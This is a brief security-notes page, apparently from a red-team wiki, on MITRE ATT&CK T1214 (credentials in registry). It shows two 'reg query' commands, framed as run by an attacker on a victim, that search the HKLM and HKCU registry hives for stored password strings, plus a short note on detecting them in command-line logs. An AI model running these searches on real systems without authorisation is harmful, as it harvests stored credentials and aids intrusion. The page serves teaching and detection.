Skip to content

T1214: Credentials in Registry

Execution

Scanning registry hives for the value password:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

reg query HKLM /f password /t REG_SZ /s
# or
reg query HKCU /f password /t REG_SZ /s
{% endcode-tabs-item %} {% endcode-tabs %}

Observations

As a defender, you may want to monitor commandline argument logs and look for any that include req query and passwordstrings:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1214" %}